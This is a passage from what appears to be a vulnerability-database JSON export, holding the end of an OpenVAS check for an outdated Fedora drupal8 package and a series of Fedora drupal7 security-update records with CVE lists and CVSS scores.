Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:08", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.60-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602"], "modified": "2018-12-03T01:39:08", "id": "FEDORA:166216048166", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EV4RZIREFWKABPNE6QLBRMUZOKCTPEP7/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-09T01:42:20", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.66-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-11358"], "modified": "2019-05-09T01:42:20", "id": "FEDORA:3787360525AF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-02T01:36:56", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.65-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-6341"], "modified": "2019-04-02T01:36:56", "id": "FEDORA:EB9606076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y4SVTVIJ33XCFQ6X6XTVMQM3NPLP2WFS/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-25T01:11:40", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.67-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-11358", "CVE-2019-11831"], "modified": "2019-05-25T01:11:40", "id": "FEDORA:0E6FD60E1861", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Z246UWBXBEKTQUDTLRJTC7XYBIO4IBE4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-05T20:37:11", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.59-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-05T20:37:11", "id": "FEDORA:9178B6014B98", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KPO4EJLZY4SDGJWGXADAUADLGFZ322GX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2018-12-03T02:41:23", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.60-2.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2018-12-03T02:41:23", "id": "FEDORA:D90E96042F26", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/X5UKYWO2565POL24GEOZHWPYTYPN6T3S/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2013-01-28T15:03:43", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.19-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-01-28T15:03:43", "id": "FEDORA:5FB4B204CD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGJZFLGUBPTFREOUNRUQ35XMJBKRNPOC/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2013-01-28T15:09:37", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.19-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-01-28T15:09:37", "id": "FEDORA:B6AC321C62", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LMNJSSHJR4FNIJG4MOMXOA6HDXIZWGK6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2013-03-05T23:26:08", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.20-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-03-05T23:26:08", "id": "FEDORA:5C74620FE5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SQR22OZNUMVBRAIQOQKWU7L4UXSWPCZI/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2012-06-02T03:53:22", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: drupal7-7.14-2.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-02T03:53:22", "id": "FEDORA:EED772139C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MF6OZZTXMNKU47Y6NWRFQL4R5WBRJLRO/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2012-06-03T23:24:18", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.14-2.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-03T23:24:18", "id": "FEDORA:5177721081", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LVR46VE7X3KL2EEPVJAHX5E4JCAHEEIG/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2019-03-06T06:58:56", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.64-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-06T06:58:56", "id": "FEDORA:0237760A2394", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QLDL4RPEK6NZBNPCXUVPH5DPWLROWFJ6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2012-10-28T00:58:28", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.16-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-10-28T00:58:28", "id": "FEDORA:73B74211EF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RCEK6QMYYFFISXJ4S4WJX23H6VC5MUNL/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2012-10-28T00:58:18", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.16-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-10-28T00:58:18", "id": "FEDORA:2189021027", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GXZQYXRBY675CLK6KQ5CLJ7HVT4WGMMP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2012-06-02T03:52:43", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.14-2.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-02T03:52:43", "id": "FEDORA:32E6221306", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/P52YCHNFXUTM6GATOCA6PMYPMH6D6DAK/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-05-09T03:18:10", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.66-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-11358"], "modified": "2019-05-09T03:18:10", "id": "FEDORA:3230260BA78B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-02T02:15:03", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.65-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-6341"], "modified": "2019-04-02T02:15:03", "id": "FEDORA:5E1A16076017", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/P4KTET2PTSIS3ZZ4SGBRQEN6CCLV5SYX/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-27T10:47:49", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-25T03:36:33", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.67-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-11358", "CVE-2019-11831"], "modified": "2019-05-25T03:36:33", "id": "FEDORA:2B920607600F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E3NUKPG7V4QEM6QXRMHYR4ABFMW5MM2P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2013-01-05T06:35:46", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.18-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-5653"], 